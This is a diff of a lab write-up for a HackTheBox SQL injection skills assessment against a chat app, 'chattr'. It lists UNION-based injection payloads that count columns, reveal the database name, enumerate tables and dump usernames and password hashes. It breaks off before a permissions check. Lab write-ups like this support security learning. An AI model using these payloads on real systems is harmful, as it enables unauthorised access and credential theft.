Collinformatics/HackTheBox/SkillsAssessment/SQLInjectionFundamentals/writeup.md

 The "search in conversation" input field uses a GET request to retrieve data from the database.
 This represents a potential injection point.

-- Lets start by determine the number of columns we are working with
+Lets start by determine the number of columns we are working with

 - We can do so with this injection:

       ') UNION SELECT 1,2,3,4-- -

 - This allows us to break out of the original query with ')
 - Then the UNION SELECT aligns the columns
 - The result shows that columns "3" and "4" are displayed, and can be used to leak information

 <img width="1282" height="445" alt="chattr1" src="https://github.com/user-attachments/assets/62606693-24af-4058-9f0b-a981d4dbd094" />

-- Lets try a basic exploit to find the database name with this injection:
+Lets try a basic exploit to find the database name with this injection:

     ') UNION SELECT 1,2,database(),4 FROM INFORMATION_SCHEMA.SCHEMATA #

 - This returns: chattr

 <img width="1282" height="445" alt="chattr2" src="https://github.com/user-attachments/assets/705aabe0-e1bc-4fee-acdd-471273234a79" />

-- Now lets enumerate the databases and tables, we can do that with:
+Now lets enumerate the databases and tables, we can do that with:

     ') UNION SELECT 1,2,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES-- -

-  - This returns a long list of information but lets focus on:
+- This returns a long list of information but lets focus on the following:
   - Table: Users
   - Database: chattr

 ...

-- We can get the password hashes with:
+We can get the password hashes with:

     ') UNION SELECT 1,2,Username,Password FROM chattr.Users-- -

 Next, lets see what permissions are avalible with the payload: